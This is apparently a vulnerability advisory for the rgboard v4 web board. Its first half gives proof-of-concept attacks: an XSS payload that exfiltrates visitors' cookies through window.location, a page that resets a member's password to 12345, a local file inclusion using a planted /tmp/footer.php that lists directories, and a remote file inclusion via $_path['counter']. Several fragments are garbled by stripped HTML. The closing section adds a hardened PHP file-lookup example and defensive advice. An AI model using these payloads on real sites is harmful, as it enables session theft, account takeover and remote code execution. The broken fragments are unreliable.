
rgboard v4 (07.07.27) Multiple Vulnerabilities


XSS Vulnerability



$bd_content = rg_conv_text($bd_content,$bd_html); //You have to check 'html use'.



Inject XSS tag : 
"" Hi">onError="window.location=''+document.cookie+'&l='+window.location">Hi there! :) 

/rghunter.php - sets the password to 12345


  $chk = 0;

  for($i = 0; $i < strlen($url); $i++)
	if($url[$i] == '/')
		$chk = $i;
  for($i = $chk; $i < strlen($url); $i++)
  	$url[$i] = "";

  $url = $url."/../rg4_member/modify.php";

"http:// ?>?" method = "post" name = "member_info"> value="">
/***************************
Local File Inclusion Vulnerability

/_footer.php

if(file_exists($skin_path."footer.php")) include($skin_path."footer.php"); //File inclusion
*************************/

poc:
//yeah, there is a problem.. file_exists()!
//How can we bypass it? I don`t know :)
//If we have account in same server with target, we can attack his board easily
//Here is the example :

/tmp/footer.php

handle . "\n";
echo "Path: " . $d->path . "\n";
while (false !== ($entry = $d->read())) {
   echo $entry."\n";
}
$d->close();
?>

//Yeah, It is good, But when we don`t account in that server, How we can beat target?
//We can find a clue from
//On windows, use //computername/share/filename or \\computername\share\filename to check files on network shares.
//As of PHP 5.0.0, this function can also be used with some URL wrappers. Refer to List of Supported Protocols/Wrappers
//for a listing of which wrappers support stat() family of functionality.
//Do you find clue too? :-O

/***************************
Remote File Inclusion Vulnerability

/footer.php

..
include($_path['counter']."rg_counter.php"); ?> //File inclusion
*************************/

poc:[counter]=
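
Both include() calls above build the include path from a variable the code never pins down, and file_exists() only confirms that something is there, not that it belongs to the board. The following is an added example of a hardened lookup, not rgboard's own code or an official patch; SKIN_ROOT, rg_safe_skin_file() and the skin directory layout are assumptions.

```php
<?php
// Added example, not rgboard code. SKIN_ROOT and rg_safe_skin_file() are
// assumed names; the skin directory layout is an assumption as well.
define('SKIN_ROOT', __DIR__ . '/skin');

// Returns the absolute path of $file inside skin $skin, or null to refuse.
function rg_safe_skin_file(string $skin, string $file, string $root = SKIN_ROOT): ?string
{
    // Names are plain identifiers: no '/', '\', '..' or "scheme://" can pass,
    // so absolute paths, UNC shares and URL wrappers are refused up front.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $skin)) {
        return null;
    }
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.php\z/', $file)) {
        return null;
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    // realpath() resolves symlinks and returns false for missing files,
    // so it covers the existence test file_exists() was used for.
    $candidate = realpath($rootReal . DIRECTORY_SEPARATOR . $skin . DIRECTORY_SEPARATOR . $file);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Containment: the resolved file must still live under the skin root.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed inputs: one ordinary skin name plus the path shapes the
// advisory mentions. "default" is accepted only if skin/default/footer.php exists.
$samples = ['default', '/tmp/', '//computername/share/', 'scheme://host/'];
foreach ($samples as $skin) {
    $path = rg_safe_skin_file($skin, 'footer.php');
    echo str_pad($skin, 26), $path === null ? 'refused' : "include $path", "\n";
}
```

The same rule applies to include($_path['counter']."rg_counter.php"): build that path from a constant defined in code rather than from a variable that request data can reach, and keep allow_url_include off in php.ini.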
